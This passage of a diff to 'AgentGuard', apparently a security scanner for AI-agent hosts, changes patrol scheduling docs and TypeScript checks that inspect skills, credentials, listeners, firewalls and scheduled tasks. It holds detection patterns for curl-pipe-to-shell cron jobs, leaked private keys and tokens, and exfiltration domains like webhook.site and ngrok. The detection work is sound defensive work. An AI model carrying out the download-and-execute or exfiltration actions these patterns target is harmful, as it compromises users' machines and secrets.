+- `<schedule>` must be exactly five fields containing only portable cron characters (`A-Z`, `a-z`, digits, `*`, `/`, `,`, and `-`). Reject quotes, shell metacharacters, null bytes, or newlines.
+- `<NODE_EXE>` must be an absolute path. Reject paths containing single quotes, null bytes, or newlines.
+- `<AGENTGUARD_CLI>` must be an absolute path. Reject paths containing single quotes, null bytes, or newlines.
 - Do not include notification channel, chat ID, or webhook values in the system crontab entry. System cron writes only to the local patrol log.
 
-Generate the crontab entry using a single-quoted skill directory. If `<SKILL_DIR>` contains spaces, keep it inside the quotes exactly as shown:
+Generate the crontab entry using the resolved existing CLI path. If it contains spaces, keep it inside the single quotes exactly as shown:
 ```
-<schedule> cd '<SKILL_DIR>' && AGENTGUARD_AUTO_SCAN=1 node scripts/auto-scan.js >> "$HOME/.agentguard/patrol.log" 2>&1
+<schedule> '<NODE_EXE>' '<AGENTGUARD_CLI>' checkup --json >> "$HOME/.agentguard/patrol.log" 2>&1
 ```
 
 **Show the exact entry and wait for explicit user confirmation before writing.**
 
 After confirmation, add the entry to the user's crontab:
 ```bash
-(crontab -l 2>/dev/null; printf '%s\n' "<schedule> cd '<SKILL_DIR>' && AGENTGUARD_AUTO_SCAN=1 node scripts/auto-scan.js >> \"\$HOME/.agentguard/patrol.log\" 2>&1") | crontab -
+(crontab -l 2>/dev/null; printf "%s '%s' '%s' checkup --json >> \"\$HOME/.agentguard/patrol.log\" 2>&1\n" '<schedule>' '<NODE_EXE>' '<AGENTGUARD_CLI>') | crontab -
 ```
 
 Verify with `crontab -l | grep agentguard`.
 
-#### Path C — Neither available
+#### Path D — No scheduler available
 
 Output the crontab entry for the user to add manually:
 ```
-<schedule> cd '<SKILL_DIR>' && AGENTGUARD_AUTO_SCAN=1 node scripts/auto-scan.js >> "$HOME/.agentguard/patrol.log" 2>&1
+<schedule> '<NODE_EXE>' '<AGENTGUARD_CLI>' checkup --json >> "$HOME/.agentguard/patrol.log" 2>&1
 ```
-Explain that neither `openclaw` nor `crontab` was found in PATH, so the entry must be added manually.
+On Unix-like hosts, explain that neither `openclaw` nor `crontab` was found in PATH, so the entry must be added manually. On Windows, explain that `schtasks.exe` was not available and direct the user to enable the Task Scheduler service or create a daily task in the Task Scheduler GUI using the same wrapper command.
 
 ### patrol status
 
@@ -759,10 +803,11 @@ Show the current patrol state.
 
 **Steps**:
 
-1. Read `~/.agentguard/audit.jsonl`, find the most recent `event: "patrol"` or `event: "auto_scan"` entry. If found, display: timestamp, overall status, finding counts.
+1. Read `~/.agentguard/audit.jsonl` and find the most recent `event: "checkup"` entry whose `checks` value is `8`. If found, display its `timestamp`, `tier`, `composite_score`, and `findings` values. Never report `event: "auto_scan"` as a completed patrol.
 2. **OpenClaw available**: run `openclaw cron list` and look for `agentguard-patrol`. Show schedule, timezone, last/next run time if found.
-3. **System crontab available**: run `crontab -l 2>/dev/null | grep agentguard`. Show the matching entry if found.
-4. If no cron is configured on any platform, suggest: `/agentguard patrol setup`.
+3. **Windows Task Scheduler available**: run `schtasks.exe /Query /TN "AgentGuard-agentguard-patrol" /FO LIST /V`. Show status, schedule, last run, next run, and last result when present. Do not fall back to `crontab` on Windows.
+4. **System crontab available**: run `crontab -l 2>/dev/null | grep agentguard`. Show the matching entry if found.
+5. If no scheduled patrol is configured on any platform, suggest: `/agentguard patrol setup`.
 
 ---
 
@@ -1314,8 +1359,12 @@ Regardless of channel, always end with:
 
 Append a summary entry to `~/.agentguard/audit.jsonl`:
 ```json
-{"timestamp":"...","event":"checkup","composite_score":<n>,"tier":"<grade>","checks":6,"findings":<count>,"skills_scanned":<count>,"dsh_plugins_scanned":<count>}
+{"timestamp":"...","event":"checkup","composite_score":<n>,"tier":"<grade>","checks":7,"findings":<count>,"skills_scanned":<count>,"dsh_plugins_scanned":<count>}
 ```
+
+This 7-check interactive health-report event is not a completed patrol. Only
+the packaged CLI collector used by `patrol run` and local schedulers writes
+`checks: 8`, which is why `patrol status` filters on that value.
 
 ---
 

--- a/skills/agentguard/patrol-checks.md
+++ b/skills/agentguard/patrol-checks.md
@@ -169,6 +169,11 @@ Cross-reference remote IPs/domains against:
 # OpenClaw cron jobs
 openclaw cron list 2>/dev/null
 
+# Windows Task Scheduler (run on Windows)
+schtasks.exe /Query /FO CSV /V
+# For each AgentGuard or suspicious task, inspect the authoritative XML fields
+schtasks.exe /Query /TN "<task-name>" /XML
+
 # System crontab
 crontab -l 2>/dev/null
 
@@ -186,6 +191,9 @@ ls -la ~/.config/systemd/user/ 2>/dev/null
 
 Scan cron command bodies for:
 
+On Windows, inspect each selected task's XML `UserId`, `LogonType`, `RunLevel`,
+`Command`, and `Arguments`. Do not infer `RunLevel` from localized verbose CSV.
+
 | Pattern | Description | Severity |
 |---------|-------------|----------|
 | `curl.*\|\s*(bash\|sh)` | curl pipe to shell | CRITICAL |
@@ -202,6 +210,8 @@ Scan cron command bodies for:
 | Unknown cron job touching `$OC/` as root | HIGH |
 | Cron job downloading from external URL | HIGH |
 | Cron job not present in `openclaw cron list` but touches `$OC/` | MEDIUM |
+| Unknown Windows scheduled task touching AgentGuard or agent directories | MEDIUM |
+| Windows task runs as SYSTEM or with highest privileges without a documented need | HIGH |
 
 ---
 

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -1,8 +1,9 @@
 #!/usr/bin/env node
 
-import { appendFileSync, existsSync, mkdirSync, mkdtempSync, readdirSync, readFileSync, statSync, writeFileSync } from 'node:fs';
+import { appendFileSync, closeSync, existsSync, mkdirSync, mkdtempSync, openSync, readSync, readdirSync, readFileSync, statSync, writeFileSync } from 'node:fs';
 import { execFile } from 'node:child_process';
-import { dirname, join, resolve } from 'node:path';
+import { createHash } from 'node:crypto';
+import { dirname, extname, join, relative, resolve, sep } from 'node:path';
 import { tmpdir, homedir } from 'node:os';
 import { Command } from 'commander';
 import { AgentGuardCloudClient } from './cloud/client.js';
@@ -21,6 +22,9 @@ import {
 } from './config.js';
 import type { AgentGuardAgentHost, AgentGuardConfig } from './config.js';
 import { SkillScanner } from './scanner/index.js';
+import type { DirectoryScanSnapshot } from './scanner/file-walker.js';
+import { SkillRegistry } from './registry/index.js';
+import type { TrustRecord } from './types/registry.js';
 import { resolveScanSource } from './scanner/source.js';
 import { formatProtectResult, protectAction, exitCodeForDecision } from './runtime/protect.js';
 import { approvePendingApproval, listPendingApprovals } from './runtime/approvals.js';
@@ -44,6 +48,7 @@ import { renderDshComparisonMarkdown } from './reports/dsh-compare-report.js';
 import {
   installThreatFeedCron,
   removeThreatFeedCron,
+  runWindowsCronTick,
   validateCronExpression,
   type OpenClawCronInstallResult,
   type CronBackend,
@@ -209,6 +214,14 @@ async function main() {
         console.log(`Saved Cloud configuration for ${config.cloudUrl}.`);
         console.log(`Policy fetch failed; local protection still works offline. ${error instanceof Error ? error.message : ''}`.trim());
       }
+    });
+
+  program
+    .command('windows-cron-run', { hidden: true })
+    .description('Internal: evaluate and run a Windows Task Scheduler cron tick')
+    .requiredOption('--config <path>', 'Managed Windows cron config path')
+    .action(async (options) => {
+      await runWindowsCronTick(resolve(options.config as string));
     });
 
   program
@@ -561,7 +574,7 @@ async function main() {
     .option('--quiet', 'Run the full pull, self-check, and match-reporting flow with minimal output')
     .option('--no-report', 'Skip uploading self-check results back to Cloud')
     .option('--cron <expr>', 'Install a cron job with a five-field cron expression, for example "0 * * * *"')
-    .option('--cron-target <target>', 'Cron backend: auto, openclaw, qclaw, hermes, or system', 'auto')
+    .option('--cron-target <target>', 'Cron backend: auto, openclaw, qclaw, hermes, system, or windows', 'auto')
     .option('--cron-name <name>', 'Cron job name', 'agentguard-threat-feed')
     .option('--force', 'Replace an existing cron job with the same name')
     .option('--cron-run', 'Internal: run from the OpenClaw cron prompt without trying to install cron again')
@@ -920,8 +933,8 @@ async function main() {
         if (!summary.cron.result.created) {
           console.log('Existing cron jobs are not reconfigured unless --force is passed; rerun with --force to apply the requested quiet/manual mode and schedule.');
         }
-        if (summary.cron.result.backend === 'system') {
-          console.log(`System cron output: ${join(getAgentGuardPaths().home, 'feed-cron.log')}`);
+        if (summary.cron.result.backend === 'system' || summary.cron.result.backend === 'windows-task-scheduler') {
+          console.log(`Scheduled task output: ${join(getAgentGuardPaths().home, 'feed-cron.log')}`);
         } else {
           console.log('Notification rule: non-quiet cron notifies on new advisories; quiet cron notifies on local matches.');
         }
@@ -1030,8 +1043,8 @@ async function main() {
 }
 
 function validateCronTarget(value: unknown): CronBackend {
-  if (value === 'auto' || value === 'openclaw' || value === 'qclaw' || value === 'hermes' || value === 'system') return value;
-  throw new Error('Invalid cron target. Use auto, openclaw, qclaw, hermes, or system.');
+  if (value === 'auto' || value === 'openclaw' || value === 'qclaw' || value === 'hermes' || value === 'system' || value === 'windows') return value;
+  throw new Error('Invalid cron target. Use auto, openclaw, qclaw, hermes, system, or windows.');
 }
 
 function initAutoAgents(config: AgentGuardConfig, force: boolean): {
@@ -1253,16 +1266,24 @@ interface HealthCheckupReport {
 async function runLocalHealthCheckup(config: AgentGuardConfig): Promise<HealthCheckupReport> {
   const skillRoots = [
     join(homedir(), '.claude', 'skills'),
+    join(homedir(), '.codex', 'skills'),
     join(homedir(), '.openclaw', 'skills'),
     join(homedir(), '.openclaw', 'workspace', 'skills'),
     join(homedir(), '.qclaw', 'skills'),
     join(homedir(), '.qclaw', 'workspace', 'skills'),
     join(homedir(), '.hermes', 'skills'),
   ];
-  const skillDirs = discoverSkillDirs(skillRoots);
   const dshRoots = await discoverDshSelfCheckRoots();
+  const skillDirs = discoverSkillDirs([...skillRoots, ...dshRoots.skillRoots]);
   const dshPluginDirs = dshRoots.installedPluginDirs;
   const scanner = new SkillScanner({ useExternalScanner: false });
+  const registry = new SkillRegistry();
+  const registrySnapshot = await registry.list({ include_expired: true })
+    .then((records) => normalizeTrustRecords(records))
+    .catch(() => null);
+  const registryRecords = registrySnapshot?.records ?? null;
+  const patrolFileCollection = collectPatrolFiles([...dshRoots.skillRoots, ...dshPluginDirs]);
+  const patrolFiles = patrolFileCollection.files;
 
   const codeFindings: CheckupFinding[] = [];
   let codeScore = skillDirs.length === 0 && dshPluginDirs.length === 0 ? 70 : 100;
@@ -1270,26 +1291,90 @@ async function runLocalHealthCheckup(config: AgentGuardConfig): Promise<HealthCh
     codeFindings.push({ severity: 'LOW', text: 'No installed third-party skills or DSH plugins were found to audit.' });
   }
   for (const dir of skillDirs) {
-    const result = await scanner.quickScan(dir);
     const name = dir.split(/[\\/]/).pop() || dir;
-    if (result.risk_level === 'critical') codeScore -= 15;
-    if (result.risk_level === 'high') codeScore -= 8;
-    if (result.risk_level === 'medium') codeScore -= 3;
-    if (result.risk_level !== 'low') {
-      codeFindings.push({
-        severity: riskLevelToSeverity(result.risk_level),
-        text: `${name}: ${result.summary}${result.risk_tags.length ? ` (${result.risk_tags.join(', ')})` : ''}`,
-      });
+    try {
+      const result = await scanner.quickScan(dir);
+      if (result.risk_level === 'critical') codeScore -= 15;
+      if (result.risk_level === 'high') codeScore -= 8;
+      if (result.risk_level === 'medium') codeScore -= 3;
+      if (result.risk_level !== 'low') {
+        codeFindings.push({
+          severity: riskLevelToSeverity(result.risk_level),
+          text: `[Patrol 1] ${name}: ${result.summary}${result.risk_tags.length ? ` (${result.risk_tags.join(', ')})` : ''}`,
+        });
+      }
+      const artifactHash = await scanner.calculateArtifactHash(dir);
+      const sourceRecords = registryRecords?.filter((record) => record.skill.source === dir) ?? [];
+      const matchingRecord = sourceRecords.find((record) => record.skill.artifact_hash === artifactHash);
+      const integrityFinding = registryRecords === null
+        ? patrolFinding(1, 'HIGH', `Trust metadata for installed skill ${name} could not be inspected.`)
+        : sourceRecords.length === 0
+          ? patrolFinding(1, 'MEDIUM', `Installed skill ${name} has no trust-registry record.`)
+          : !matchingRecord
+            ? patrolFinding(1, 'HIGH', `Installed skill ${name} no longer matches its recorded artifact hash.`)
+            : null;
+      if (integrityFinding) {
+        codeFindings.push(integrityFinding);
+        codeScore -= findingScoreDeduction([integrityFinding]);
+      }
+    } catch {
+      const finding = patrolFinding(1, 'HIGH', `Installed skill ${name} could not be scanned safely.`);
+      codeFindings.push(finding);
+      codeScore -= findingScoreDeduction([finding]);
     }
   }
   const dshScan = await scanDshPluginsForCheckup(dshPluginDirs);
   codeScore -= dshScan.scoreDeduction;
-  codeFindings.push(...dshScan.findings);
+  codeFindings.push(...dshScan.findings.map((finding) => ({
+    ...finding,
+    text: `[Patrol 1] ${finding.text}`,
+  })));
+  for (const dir of dshPluginDirs) {
+    const name = dir.split(/[\\/]/).pop() || dir;
+    try {
+      const artifactHash = await scanner.calculateArtifactHash(dir);
+      const sourceRecords = registryRecords?.filter((record) => record.skill.source === dir) ?? [];
+      const matchingRecord = sourceRecords.find((record) => record.skill.artifact_hash === artifactHash);
+      const integrityFinding = registryRecords === null
+        ? patrolFinding(1, 'HIGH', `Trust metadata for installed DSH plugin ${name} could not be inspected.`)
+        : sourceRecords.length === 0
+          ? patrolFinding(1, 'MEDIUM', `Installed DSH plugin ${name} has no trust-registry record.`)
+          : !matchingRecord
+            ? patrolFinding(1, 'HIGH', `Installed DSH plugin ${name} no longer matches its recorded artifact hash.`)
+            : null;
+      if (integrityFinding) {
+        codeFindings.push(integrityFinding);
+        codeScore -= findingScoreDeduction([integrityFinding]);
+      }
+    } catch {
+      const finding = patrolFinding(1, 'HIGH', `Installed DSH plugin ${name} could not be hashed safely.`);
+      codeFindings.push(finding);
+      codeScore -= findingScoreDeduction([finding]);
+    }
+  }
+  const recentFileFindings = await checkRecentFilesystemChanges(patrolFileCollection, scanner);
+  const installedSources = new Set([...skillDirs, ...dshPluginDirs]);
+  const trustFindings = checkTrustRegistryHealth(
+    registryRecords,
+    registrySnapshot?.invalidRecords ?? (registrySnapshot === null ? 1 : 0),
+    installedSources,
+  );
+  codeFindings.push(...recentFileFindings, ...trustFindings);
+  codeScore -= findingScoreDeduction([...recentFileFindings, ...trustFindings]);
   codeScore = clampScore(codeScore);
 
-  const credential = checkCredentialSafety(skillDirs);
-  const network = await checkNetworkExposure(config);
-  const runtime = checkRuntimeProtection(config, skillDirs.length);
+  const credential = await checkCredentialSafety(skillDirs, patrolFileCollection);
+  const networkExposure = await checkNetworkExposure();
+  const schedulerFindings = await checkScheduledTaskSafety();
+  const network = combineCheckupDimension(networkExposure, schedulerFindings, 'network and scheduled-task');
+  const runtimeProtection = checkRuntimeProtection(config, skillDirs.length);
+  const auditFindings = checkAuditLogSafety(config.auditPath);
+  const configurationFindings = checkEnvironmentConfiguration(config);
+  const runtime = combineCheckupDimension(
+    runtimeProtection,
+    [...auditFindings, ...configurationFindings],
+    'runtime, audit, and configuration',
+  );
   const web3 = checkWeb3Safety(skillDirs);
 
   const dimensions = {
@@ -1334,8 +1419,13 @@ function discoverSkillDirs(roots: string[]): string[] {
       continue;
     }
     for (const entry of entries) {
-      if (!entry.isDirectory()) continue;
+      if (!entry.isDirectory() && !entry.isSymbolicLink()) continue;
       const dir = join(root, entry.name);
+      try {
+        if (!statSync(dir).isDirectory()) continue;
+      } catch {
+        continue;
+      }
       if (!existsSync(join(dir, 'SKILL.md'))) continue;
       if (isManagedAgentGuardSkillDir(dir)) continue;
       dirs.push(dir);
@@ -1366,23 +1456,132 @@ function isManagedAgentGuardSkillDir(dir: string): boolean {
   return true;
 }
 
-function checkCredentialSafety(skillDirs: string[]): CheckupDimension {
+interface PatrolFile {
+  path: string;
+  mtimeMs: number;
+  size: number;
+}
+
+interface PatrolFileCollection {
+  files: PatrolFile[];
+  truncated: boolean;
+  traversalErrors: number;
+}
+
+function patrolFinding(check: number, severity: CheckupFinding['severity'], text: string): CheckupFinding {
+  return { severity, text: `[Patrol ${check}] ${text}` };
+}
+
+function findingScoreDeduction(findings: CheckupFinding[]): number {
+  return findings.reduce((total, finding) => total + (
+    finding.severity === 'CRITICAL' ? 25 :
+      finding.severity === 'HIGH' ? 15 :
+        finding.severity === 'MEDIUM' ? 8 : 2
+  ), 0);
+}
+
+function combineCheckupDimension(
+  base: CheckupDimension,
+  additions: CheckupFinding[],
+  label: string,
+): CheckupDimension {
+  const findings = [...base.findings, ...additions];
+  return {
+    score: clampScore((base.score ?? 100) - findingScoreDeduction(additions)),
+    findings,
+    details: findings.length ? `${findings.length} ${label} issue(s) found.` : `No ${label} issues found.`,
+  };
+}
+
+function collectPatrolFiles(additionalRoots: string[] = []): PatrolFileCollection {
+  const roots = [...new Set([
+    join(homedir(), '.claude'),
+    join(homedir(), '.codex'),
+    join(homedir(), '.openclaw'),
+    join(homedir(), '.qclaw'),
+    join(homedir(), '.hermes'),
+    join(homedir(), '.ssh'),
+    join(homedir(), '.gnupg'),
+    ...additionalRoots,
+  ])];
+  const files: PatrolFile[] = [];
+  const pending = roots.filter(existsSync);
+  let totalBytes = 0;
+  let traversalErrors = 0;
+  let skippedForLimits = false;
+  while (pending.length > 0 && files.length < 1000 && totalBytes < 8 * 1024 * 1024) {
+    const directory = pending.shift()!;
+    let entries;
+    try {
+      entries = readdirSync(directory, { withFileTypes: true });
+    } catch {
+      traversalErrors += 1;
+      continue;
+    }
+    for (const entry of entries) {
+      if (entry.isSymbolicLink()) {
+        traversalErrors += 1;
+        continue;
+      }
+      const path = join(directory, entry.name);
+      if (entry.isDirectory()) {
+        if (!['node_modules', '.git', 'dist', 'coverage'].includes(entry.name)) pending.push(path);
+        continue;
+      }
+      if (!entry.isFile()) continue;
+      try {
+        const info = statSync(path);
+        if (info.size > 512 * 1024 || totalBytes + info.size > 8 * 1024 * 1024) {
+          skippedForLimits = true;
+          continue;
+        }
+        files.push({ path, mtimeMs: info.mtimeMs, size: info.size });
+        totalBytes += info.size;
+        if (files.length >= 1000) break;
+      } catch {
+        traversalErrors += 1;
+        continue;
+      }
+    }
+  }
+  return {
+    files,
+    truncated: skippedForLimits || pending.length > 0 || files.length >= 1000 || totalBytes >= 8 * 1024 * 1024,
+    traversalErrors,
+  };
+}
+
+function readPatrolFile(file: PatrolFile): string {
+  if (file.size > 512 * 1024) return '';
+  try {
+    return readFileSync(file.path, 'utf8');
+  } catch {
+    return '';
+  }
+}
+
+async function checkCredentialSafety(skillDirs: string[], collection: PatrolFileCollection): Promise<CheckupDimension> {
   let score = 100;
   const findings: CheckupFinding[] = [];
-  for (const [path, severity] of [
-    [join(homedir(), '.ssh'), 'HIGH'],
-    [join(homedir(), '.gnupg'), 'MEDIUM'],
-  ] as const) {
-    const mode = permissionMode(path);
-    if (mode !== null && mode > 0o700) {
-      score -= severity === 'HIGH' ? 25 : 15;
-      findings.push({ severity, text: `${path} permissions are ${mode.toString(8)}; expected 700 or stricter.` });
+  const patrolFiles = collection.files;
+  const privateDirectories = [join(homedir(), '.ssh'), join(homedir(), '.gnupg')];
+  if (process.platform === 'win32') {
+    findings.push(...await checkWindowsAclExposure(privateDirectories, 2));
+  } else {
+    for (const [path, severity] of [
+      [privateDirectories[0], 'HIGH'],
+      [privateDirectories[1], 'MEDIUM'],
+    ] as const) {
+      const mode = permissionMode(path);
+      if (mode !== null && mode > 0o700) {
+        findings.push(patrolFinding(2, severity, `${path} permissions are ${mode.toString(8)}; expected 700 or stricter.`));
+      }
     }
   }
 
   const secretPatterns = [
-    { re: /0x[a-fA-F0-9]{64}|-----BEGIN [A-Z ]*PRIVATE KEY-----/, severity: 'CRITICAL' as const, label: 'Plaintext private key pattern' },
-    { re: /\b(seed_phrase|mnemonic)\b/i, severity: 'CRITICAL' as const, label: 'Mnemonic or seed phrase marker' },
+    { re: /(?:\bprivate[_ -]?key\b\s*[:=]\s*['"]?0x[a-fA-F0-9]{64}\b|['"]0x[a-fA-F0-9]{64}['"]|-----BEGIN [A-Z ]*PRIVATE KEY-----)/i, severity: 'CRITICAL' as const, label: 'Plaintext private key pattern' },
+    { re: /\b(seed_phrase|mnemonic)\b\s*[:=]\s*['"][^'"\r\n]{16,}/i, severity: 'CRITICAL' as const, label: 'Mnemonic or seed phrase assignment' },
     { re: /\bAKIA[0-9A-Z]{16}\b|\bgh[pousr]_[A-Za-z0-9_]{20,}\b/, severity: 'HIGH' as const, label: 'API key or token pattern' },
   ];
   for (const dir of skillDirs) {
@@ -1396,10 +1595,23 @@ function checkCredentialSafety(skillDirs: string[]): CheckupDimension {
     }
     for (const pattern of secretPatterns) {
       if (!pattern.re.test(body)) continue;
-      score -= pattern.severity === 'CRITICAL' ? 25 : 15;
-      findings.push({ severity: pattern.severity, text: `${pattern.label} found in ${manifest}.` });
+      findings.push(patrolFinding(2, pattern.severity, `${pattern.label} found in ${manifest}.`));
     }
   }
+  const inspected = new Set(skillDirs.map((dir) => join(dir, 'SKILL.md')));
+  for (const file of patrolFiles) {
+    if (inspected.has(file.path) || isInsideManagedAgentGuardSkill(file.path) || !isSecurityRelevantPatrolFile(file.path)) continue;
+    const body = readPatrolFile(file);
+    for (const pattern of secretPatterns) {
+      if (!pattern.re.test(body)) continue;
+      findings.push(patrolFinding(2, pattern.severity, `${pattern.label} found in ${file.path}.`));
+      break;
+    }
+  }
+  if (collection.truncated || collection.traversalErrors > 0) {
+    findings.push(patrolFinding(2, 'MEDIUM', 'Credential scanning coverage was incomplete because one or more agent files could not be enumerated within safety limits.'));
+  }
+  score -= findingScoreDeduction(findings);
   return {
     score: clampScore(score),
     findings,
@@ -1407,43 +1619,540 @@ function checkCredentialSafety(skillDirs: string[]): CheckupDimension {
   };
 }
 
-async function checkNetworkExposure(config: AgentGuardConfig): Promise<CheckupDimension> {
-  let score = 100;
+function isInsideManagedAgentGuardSkill(path: string): boolean {
+  const match = path.match(/^(.*[\\/]skills[\\/]agentguard)(?:[\\/]|$)/i);
+  return Boolean(match && isManagedAgentGuardSkillDir(match[1]));
+}
+
+async function checkWindowsAclExposure(paths: string[], patrolCheck: number): Promise<CheckupFinding[]> {
   const findings: CheckupFinding[] = [];
-  const listeners = await runCommandText('lsof', ['-i', '-P', '-n']);
-  for (const port of ['2375', '3306', '6379', '27017']) {
-    const exposed = new RegExp(`(\\*|0\\.0\\.0\\.0):${port}\\b`).test(listeners);
+  for (const path of paths) {
+    if (!existsSync(path)) continue;
+    const result = await runCommandText('icacls.exe', [path]);
+    if (!result.available) {
+      findings.push(patrolFinding(patrolCheck, 'MEDIUM', `Windows ACLs for ${path} could not be inspected with icacls.exe.`));
+      continue;
+    }
+    if (/(?:Everyone|Authenticated Users|BUILTIN\\Users|\*S-1-1-0|\*S-1-5-11|\*S-1-5-32-545):(?:\([^\r\n)]*\))*\([^\r\n)]*[FMWR]/i.test(result.output)) {
+      findings.push(patrolFinding(patrolCheck, 'HIGH', `${path} grants broad Windows account groups access to security-sensitive data.`));
+    }
+  }
+  return findings;
+}
+
+function isSecurityRelevantPatrolFile(path: string): boolean {
+  return /(?:^|[\\/])\.env[^\\/]*$|\.(?:js|cjs|mjs|ts|py|sh|md|json|ya?ml|toml|txt|log)$/i.test(path);
+}
+
+async function checkNetworkExposure(): Promise<CheckupDimension> {
+  const findings: CheckupFinding[] = [];
+  const listenerResult = process.platform === 'win32'
+    ? await runCommandText('netstat.exe', ['-ano'])
+    : await firstAvailableCommand([
+      ['lsof', ['-i', '-P', '-n']],
+      ['ss', ['-tlnp']],
+    ]);
+  const listeners = listenerResult.output;
+  if (!listenerResult.available) {
+    findings.push(patrolFinding(3, 'MEDIUM', 'Network listeners could not be inspected with an available system collector.'));
+  }
+  for (const port of ['2375', '3306', '5432', '6379', '27017']) {
+    const exposed = new RegExp(`(?:\\*|0\\.0\\.0\\.0|\\[?::\\]?):${port}\\b`).test(listeners);
     if (exposed) {
-      score -= 25;
-      findings.push({ severity: 'HIGH', text: `High-risk service appears exposed on 0.0.0.0:${port}.` });
+      findings.push(patrolFinding(3, 'HIGH', `High-risk service appears exposed on 0.0.0.0:${port}.`));
     }
   }
 
-  const cron = await runCommandText('crontab', ['-l']);
-  if (/(curl\b.*\|\s*(bash|sh)|wget\b.*\|\s*(bash|sh)|\.ssh)/i.test(cron)) {
-    score -= 30;
-    findings.push({ severity: 'HIGH', text: 'Suspicious cron entry found that downloads shell code or accesses SSH material.' });
-  }
-
-  const sensitiveEnvNames = Object.keys(process.env).filter((name) => /PRIVATE_KEY|MNEMONIC|SECRET|PASSWORD/i.test(name));
-  if (sensitiveEnvNames.length > 0) {
-    score -= 20;
-    findings.push({ severity: 'MEDIUM', text: `Sensitive environment variable names are present: ${sensitiveEnvNames.slice(0, 8).join(', ')}.` });
-  }
-
-  for (const path of [join(homedir(), '.openclaw', 'openclaw.json'), join(homedir(), '.openclaw', 'devices', 'paired.json')]) {
-    const mode = permissionMode(path);
-    if (mode !== null && mode > 0o600) {
-      score -= 15;
-      findings.push({ severity: 'MEDIUM', text: `${path} permissions are ${mode.toString(8)}; expected 600 or stricter.` });
+  const firewallResult = process.platform === 'win32'
+    ? await runCommandText('powershell.exe', [
+      '-NoProfile',
+      '-NonInteractive',
+      '-Command',
+      'Get-NetFirewallProfile | Select-Object Name,Enabled | ConvertTo-Json -Compress',
+    ])
+    : await firstAvailableCommand([
+      ['ufw', ['status']],
+      ['iptables', ['-L', 'INPUT', '-n']],
+    ]);
+  if (!firewallResult.available) {
+    findings.push(patrolFinding(3, 'MEDIUM', 'Firewall state could not be inspected with an available system collector.'));
+  } else if (/Status:\s*inactive/i.test(firewallResult.output) || /Chain INPUT \(policy ACCEPT\)/i.test(firewallResult.output)) {
+    findings.push(patrolFinding(3, 'MEDIUM', 'The host firewall appears inactive or has a default-accept inbound policy.'));
+  } else if (process.platform === 'win32') {
+    try {
+      const parsed = JSON.parse(firewallResult.output || '[]') as Record<string, unknown> | Array<Record<string, unknown>>;
+      const profiles = Array.isArray(parsed) ? parsed : [parsed];
+      if (profiles.some((profile) => profile.Enabled === false)) {
+        findings.push(patrolFinding(3, 'MEDIUM', 'One or more Windows Firewall profiles are disabled.'));
+      }
+    } catch {
+      findings.push(patrolFinding(3, 'MEDIUM', 'Windows Firewall state was returned in an unreadable format.'));
     }
+  }
+
+  const outboundResult = process.platform === 'win32'
+    ? await runCommandText('netstat.exe', ['-ao'])
+    : await firstAvailableCommand([
+      ['ss', ['-tp', 'state', 'established']],
+      ['lsof', ['-i', '-P']],
+    ]);
+  if (!outboundResult.available) {
+    findings.push(patrolFinding(3, 'MEDIUM', 'Established outbound connections could not be inspected.'));
+  } else if (/(?:webhook\.site|requestbin\.|ngrok(?:-free)?\.|\.onion\b|\.(?:top|xyz|click|work)\b)/i.test(outboundResult.output)) {
+    findings.push(patrolFinding(3, 'HIGH', 'An established connection references a known exfiltration service or high-risk domain.'));
   }
 
   return {
-    score: clampScore(score),
+    score: clampScore(100 - findingScoreDeduction(findings)),
     findings,
-    details: findings.length ? `${findings.length} network/system exposure issue(s) found.` : 'No dangerous ports, cron entries, or config permission issues found.',
+    details: findings.length ? `${findings.length} network exposure issue(s) found.` : 'No dangerous public listeners were found.',
   };
+}
+
+async function checkScheduledTaskSafety(): Promise<CheckupFinding[]> {
+  if (process.platform === 'win32') {
+    const result = await runCommandText('powershell.exe', [
+      '-NoProfile',
+      '-NonInteractive',
+      '-Command',
+      'Get-ScheduledTask | Select-Object TaskName,TaskPath,@{n="UserId";e={$_.Principal.UserId}},@{n="LogonType";e={$_.Principal.LogonType}},@{n="RunLevel";e={$_.Principal.RunLevel}},@{n="Execute";e={($_.Actions.Execute -join " ")}},@{n="Arguments";e={($_.Actions.Arguments -join " ")}} | ConvertTo-Json -Compress',
+    ]);
+    if (!result.available) {
+      return [patrolFinding(4, 'MEDIUM', 'Windows scheduled tasks could not be inspected with PowerShell.')];
+    }
+    let tasks: Array<Record<string, unknown>>;
+    try {
+      const parsed = JSON.parse(result.output || '[]') as Record<string, unknown> | Array<Record<string, unknown>>;
+      tasks = Array.isArray(parsed) ? parsed : [parsed];
+    } catch {
+      return [patrolFinding(4, 'HIGH', 'Windows scheduled-task metadata was returned in an unreadable format.')];
+    }
+    const findings: CheckupFinding[] = [];
+    const suspiciousCandidates = tasks.filter((task) => {
+      const command = `${String(task.Execute || '')} ${String(task.Arguments || '')}`;
+      return /agentguard/i.test(String(task.TaskName || '')) ||
+        hasScheduledDownloadAndExecute(command) ||
+        touchesAgentRoot(command);
+    });
+    const inspectable = suspiciousCandidates.slice(0, 20);
+    if (suspiciousCandidates.length > inspectable.length) {
+      findings.push(patrolFinding(4, 'MEDIUM', 'More suspicious Windows tasks were found than could be deeply inspected in one patrol.'));
+    }
+    for (const task of inspectable) {
+      const command = `${String(task.Execute || '')} ${String(task.Arguments || '')}`;
+      const taskName = `${String(task.TaskPath || '')}${String(task.TaskName || '')}`;
+      if (hasScheduledDownloadAndExecute(command)) {
+        findings.push(patrolFinding(4, 'CRITICAL', `Scheduled task ${taskName} contains a download-and-execute command pattern.`));
+      }
+      if (touchesAgentRoot(command) && !/agentguard(?:\.cmd)?["']?\s+checkup\s+--json/i.test(command)) {
+        findings.push(patrolFinding(4, 'HIGH', `Unknown scheduled task ${taskName} modifies or inspects an agent installation root.`));
+      }
+      if (/agentguard/i.test(taskName) && String(task.RunLevel || '').toLowerCase() === 'highest') {
+        findings.push(patrolFinding(4, 'HIGH', `AgentGuard-related scheduled task ${taskName} requests the highest run level.`));
+      }
+      if (/agentguard/i.test(taskName) && !/interactive/i.test(String(task.LogonType || ''))) {
+        findings.push(patrolFinding(4, 'MEDIUM', `AgentGuard-related scheduled task ${taskName} is not configured for interactive-token logon.`));
+      }
+      const xml = await runCommandText('schtasks.exe', ['/Query', '/TN', taskName, '/XML']);
+      if (!xml.available) {
+        findings.push(patrolFinding(4, 'MEDIUM', `Scheduled task ${taskName} could not be verified through Task Scheduler XML.`));
+      } else if (/agentguard/i.test(taskName) && /<RunLevel>HighestAvailable<\/RunLevel>/i.test(xml.output)) {
